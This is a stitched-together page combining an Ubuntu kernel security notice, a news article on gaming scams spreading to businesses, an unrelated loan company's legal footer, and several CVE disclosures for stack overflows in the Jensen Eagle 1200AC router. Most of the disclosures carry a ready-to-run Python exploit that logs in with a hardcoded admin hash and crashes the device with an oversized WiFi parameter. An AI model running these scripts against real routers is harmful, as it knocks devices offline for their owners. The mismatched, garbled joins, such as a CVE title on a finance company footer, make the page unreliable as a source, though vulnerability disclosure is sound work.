Ubuntu Security Notice 5909-1 - It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux kernel did not properly perform bounds checking in some situations. A physically proximate attacker could use this to craft a malicious USB device that when inserted, could cause a denial of service or possibly execute arbitrary code. It was discovered that a use-after-free vulnerability existed in the Bluetooth stack in the Linux kernel. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5909-1  
March 02, 2023

linux-azure-fde vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems

Details:

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform bounds checking in some situations. A  
physically proximate attacker could use this to craft a malicious USB  
device that when inserted, could cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-3628)

It was discovered that a use-after-free vulnerability existed in the  
Bluetooth stack in the Linux kernel. A local attacker could use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3640)

Khalid Masum discovered that the NILFS2 file system implementation in the  
Linux kernel did not properly handle certain error conditions, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service or possibly execute arbitrary code. (CVE-2022-3649)

It was discovered that a race condition existed in the SMSC UFX USB driver  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41849)

It was discovered that a race condition existed in the Roccat HID driver in  
the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-41850)

Tamás Koczka discovered that the Bluetooth L2CAP implementation in the  
Linux kernel did not properly initialize memory in some situations. A  
physically proximate attacker could possibly use this to expose sensitive  
information (kernel memory). (CVE-2022-42895)

It was discovered that the binder IPC implementation in the Linux kernel  
contained a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-20928)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1103-azure-fde  5.4.0-1103.109+cvm1.1  
   linux-image-azure-fde           5.4.0.1103.109+cvm1.36

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5909-1  
   CVE-2022-3628, CVE-2022-3640, CVE-2022-3649, CVE-2022-41849,  
   CVE-2022-41850, CVE-2022-42895, CVE-2023-20928

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.4.0-1103.109+cvm1.1

Ubuntu Security Notice USN-5909-1

It's 10 p.m. Do you know what your children are playing? In the age of remote work, hackers are actively targeting kids, with implications for enterprises.

Video games are a part of nearly every kid's life, and distributed work is increasingly a part of every adult's. According to experts, it's a recipe for small-time gaming scams to turn into larger-scale business compromises.

Hackers will leverage anything popular or good in this world, and video games are no exception. As described in a March 1 blog post from Kaspersky, financially motivated attackers are targeting children, in particular, with open-faced scams aimed at stealing in-game items, account credentials, and bank details.

The story doesn't necessarily end there, though. Even a primitive phishing attack against a kid playing Fortnite could, theoretically, turn into a wider attack not just against the parent but also the parent's workplace.

An attack that targets a business, through an employee or through an employee's child, may seem like a step too much work when phishing and business email compromise are so much simpler. But, to state the obvious: Children are easy marks, and nearly all of them play video games. That, combined with the proliferation of remote work and bring-your-own-device (BYOD) policies, makes this vector a long-tailed but fruitful one for attackers.

**How Games Get Hacked**

Last year, researchers for Avanan uncovered a surge of Trojans hidden in cheat codes for the ultrapopular online game Roblox. "The file would be downloaded by the child," explains Jeremy Fuchs, cybersecurity researcher/analyst at Avanan, "and then, most likely, mistakenly uploaded to a corporate OneDrive folder. This file installs library files (DLL) into the Windows system folder. The malicious code can be perpetually referenced by Windows and remains running."

This is just one of many forms that gaming scams can take. For example, "we've seen multiple cases in which a BYOD device was compromised via a gaming-related phishing site, which led to the compromise of the connected corporate network," says Jordan LaRose, practice director for infrastructure security at NCC Group. "Another gaming-related vector we've seen in the wild are direct exploits through users playing games. This is most common on mobile devices but can affect desktop gaming as well. Attackers will either embed an exploit directly in an attractive mobile game that users download and thereby compromise their mobile device, or target a user playing a game with a remote code execution (RCE) vulnerability to compromise the computer running it."

Mere weeks ago, such a vulnerability was being exploited in the mega-hit Grand Theft Auto V.

The potential damage caused by such a compromise is clear. "Trojans like this can break applications, corrupt or remove data, and send information to the hacker," Fuchs says.

What's less obvious but more worrisome is how this damage could extend beyond the device or even the home in question.

**How Gaming Hacks Spread to Businesses**

Fuchs puts it bluntly: "The perimeter no longer exists."

"We can access work documents on home computers and vice versa," he says, "but it also relates to game usage."

Young children, especially, often play games from their parents' PCs and mobile phones or, if nothing else, their home Wi-Fi. Parents then take their PCs and phones to work, or work remotely from their home network.

Fuchs theorizes that kids "could be playing on their parents' computer and accidentally upload it. This is an easy way for compromises and malicious files to easily infect your corporate cloud." But in most cases, a child need not go that far — attackers can make the jump from home to office on their own.

"In the era of BYOD and remote working," LaRose explains, "attackers often just need to compromise a user's personal computer to get a foothold on a corporate network. Once an attacker has a foothold on a personal device, they can often steal a VPN session or browser session, or simply find a user's corporate credentials stored in their computer."

**How Businesses Can Stop the Spread**

In their blog post, Kaspersky researchers recommended that gamers practice diligent cyber hygiene: strong passwords, two-factor authentication, antivirus, and the like. They also highlighted the utility of virtual bank cards that only fill to meet the exact amount of a particular purchase.

"By entering the numbers from your bank card," Kaspersky explained, "you risk losing all the funds you have there. And remember that a bundle of licensed games selling for a song is a reason to be wary."

LaRose stresses that "gaming is not innately any more insecure an activity than normal Web browsing." Still, because gaming can be _just as_ insecure, "businesses should do everything they can to separate a user's presence in the corporate environment and the personal one."

He recommends implementing endpoint/extended detection and response (EDR/XDR) and a security operations center (SOC) that can help respond in case of a breach.

The most important defenses of all, though, are the policies and procedures businesses that implement to address remote work and BYOD.

"If BYOD is absolutely necessary for a business to function," LaRose says, "they should limit the policy to mobile phones only and ensure they use a strong mobile device management (MDM) solution that separates work and personal data on the phone. This is an imperfect solution with some workarounds for attackers but will at the very least serve as a deterrent and give the business more visibility into any potential exposures."

Hackers Target Young Gamers: How Your Child Can Cause Business Compromise

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey1 parameter at /goform/WifiBasicSet.

©2018 Eagle Financial Services Inc. All rights reserved.  
designed & maintained by Cincinnati Webtec

Eagle Financial Services, Inc./ Eagle Loan Company of Ohio, Inc. All loans are subject to our normal credit policies, and may require collateral. Not all products or services available in all states. The information provided on this website is not a commitment to lend. Individual and Joint credit available. Other conditions may apply.

In Kentucky, Ohio, and Tennessee, loans are made and serviced by Eagle Financial Services, Inc., a Kentucky corporation. In Indiana, loans are made and serviced by Sunrise Finance Company, a separate Indiana Corporation. Neither corporation nor any of its respective affiliates, directors, officers, or employees assume responsible for any acts or omissions of the other.

The brand names, taglines, and other trademarks, as well as the designs of all Eagle products and promotions belong exclusively to Eagle Financial Services, Inc. and its subsidiary companies and are protected from copying and simulation under trademark and copyright laws.

The contents of the Eagle Financial Services, Inc. website are protected from copying and distribution under national and international copyright laws and treaties throughout the world. All rights reserved.

Neither Eagle Financial Services, Inc. nor any of its affiliates, directors, officers, or employees assume any responsibility for errors or omissions in the materials in this web site. THESE MATERIALS ARE PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT.

Additionally, neither Eagle Financial Services, Inc. nor any of its affiliates, directors, officers or employees warrant the accuracy or completeness of the information, text, graphics, links or other items contained within these materials. Neither Eagle Financial Services, Inc. nor any of its affiliates, directors, officers or employees shall be liable for any special, indirect, incidental, or consequential damages, including without limitation, lost revenues or lost profits, which may result from the use of these materials. Eagle Financial Services, Inc. may make changes to these materials, or to the products described therein, at any time without notice. Eagle Financial Services, Inc. makes no commitment to update the information.

**Our Accessibility Statement**

It is the policy of Eagle Financial Services, Inc. (“Eagle”) to ensure that our services are accessible to our customers and the public, regardless of disability status, to the extent required by law. Please contact your local branch office to learn more about accessibility support services at Eagle.

**Reasonable Accommodations**  
Individuals who need a reasonable accommodation to access Eagle’s services should send an email by clicking here to provide information about the nature of the requested accommodation. Requesters should include contact information such as an email address or telephone number at which they can be reached. Depending on the nature of the request, Eagle may need sufficient notice to provide a reasonable accommodation.

**Online Accessibility**  
Eagle has designed its website with accessibility in mind. In the event that a user with a disability experiences accessibility issues with our website, please notify us by clicking here. In your communication to us please list the words "Online Accessibility" in the subject, please specify the nature of the accessibility difficulty and including the web address that may have presented an accessibility challenge.

**Third-Party Websites**  
Eagle’s website contains links to webpages hosted by third parties. Eagle does not make representations with regard to the accessibility of third-party websites and is not able to remediate accessibility barriers on such websites.

**Feedback**  
We are always working to ensure that our services are accessible to all customers and the public, including individuals with disabilities. If you have an idea or question about accessibility support services at Eagle, please contact your local branch office.

**BEWARE OF SCAMS!** Eagle will never ask you to send us cash, money orders, or gift cards as a condition to loan approval. In addition, we do not send loan checks by mail. If you are approved for a loan with us, you will close your loan in one of our offices with a member of our friendly staff. We also do not accept online payments or use text messaging for payment reminders. If you have any questions, please call your local office.

CVE-2023-24127: Eagle Financial Services Inc.

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey4_5g parameter at /goform/WifiBasicSet.

**\[CVE-2023-24126\] DoS via wepkey4\_5g parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the wepkey4\_5g parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepkey4_5g is stored into wl5g.extra.wep_key4 via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.wep_key4 and then stored into stack buffer wifi\_buf\_entry. Because the length of wepkey4_5g is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {
        "wepkey4_5g" : "A"*(0x1000),
        "security" : "wep"
        }
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24126: [CVE-2023-24126] DoS via wepkey4_5g parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey2_5g parameter at /goform/WifiBasicSet.

**\[CVE-2023-24125\] DoS via wepkey2\_5g parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the wepkey2\_5g parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepkey2_5g is stored into wl5g.extra.wep_key2 via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.wep_key2 and then stored into stack buffer wifi\_buf\_entry. Because the length of wepkey2_5g is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {
        "wepkey2_5g" : "A"*(0x1000),
        "security" : "wep"
        }
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24125: [CVE-2023-24125] DoS via wepkey2_5g parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepauth parameter at /goform/WifiBasicSet.

**\[CVE-2023-24123\] DoS via wepauth parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the wepauth parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepauth is stored into wl2g.extra.wep_type via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl2g.extra.wep_type and then stored into stack buffer wifi\_buf\_entry. Because the length of wepauth is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {
        "wepauth" : "A"*(0x1000),
        "security" : "wep"
        }
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24123: [CVE-2023-24123] DoS via wepauth parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the ssid_5g parameter at /goform/WifiBasicSet.

**\[CVE-2023-24122\] DoS via ssid\_5g parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the ssid\_5g parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string ssid_5g is stored into wl5g.extra.ssid via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.ssid and then stored into stack buffer wifi\_buf\_entry. Because the length of ssid_5g is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {"ssid_5g" : "A"*(0x1000)}
    
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24122: [CVE-2023-24122] DoS via ssid_5g parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the security_5g parameter at /goform/WifiBasicSet.

**\[CVE-2023-24121\] DoS via security\_5g parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the security\_5g parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string security_5g is stored into wl5g.extra.security via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.security and then stored into stack buffer wifi\_buf\_entry. Because the length of security_5g is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {"security_5g" : "A"*(0x800)}
    
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24121: [CVE-2023-24121] DoS via security_5g parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepauth_5g parameter at /goform/WifiBasicSet.

**\[CVE-2023-24117\] DoS via wepauth\_5g parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the wepauth\_5g parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepauth_5g is stored into wl5g.extra.wep_type via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.wep_type and then stored into stack buffer wifi\_buf\_entry. Because the length of wepauth_5g is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {
        "wepauth_5g" : "A"*(0x1000),
        "security" : "wep"
        }
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

CVE-2023-24117: [CVE-2023-24117] DoS via wepauth_5g parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey4 parameter at /goform/WifiBasicSet.

**\[CVE-2023-24129\] DoS via wepkey4 parameter in Eagle 1200ac****Description**

Jensen of Scandinavia Eagle 1200AC V15.03.06.33\_en was discovered to contain a stack overflow via the wepkey4 parameter at /goform/WifiBasicSet.

**Additional information**

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepkey4 is stored into wl2g.extra.wep_key4 via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl2g.extra.wep_key4 and then stored into stack buffer wifi\_buf\_entry. Because the length of wepkey4 is not checked, the stack buffer can be overflowed if it is a large string.

**PoC script:**

    import requests
    
    IP="192.168.38.1"
    
    logindata = {
    "username":"admin",
    "password":"81dc9bdb52d04dc20036dbd8313ed055"
    }
    
    def login():
    	for i in range(10):
    		session = requests.Session()
    		res = session.post(f"http://{IP}/login/Auth", data=logindata)
    		try:
    			passwd = session.cookies["password"]
    			return passwd
    		except:
    			pass
    
    session = requests.Session()
    session.cookies.set("password",login())
    
    payload = {
        "wepkey4" : "A"*(0x1000),
        "security" : "wep"
        }
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)
    
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)

Tag

#wifi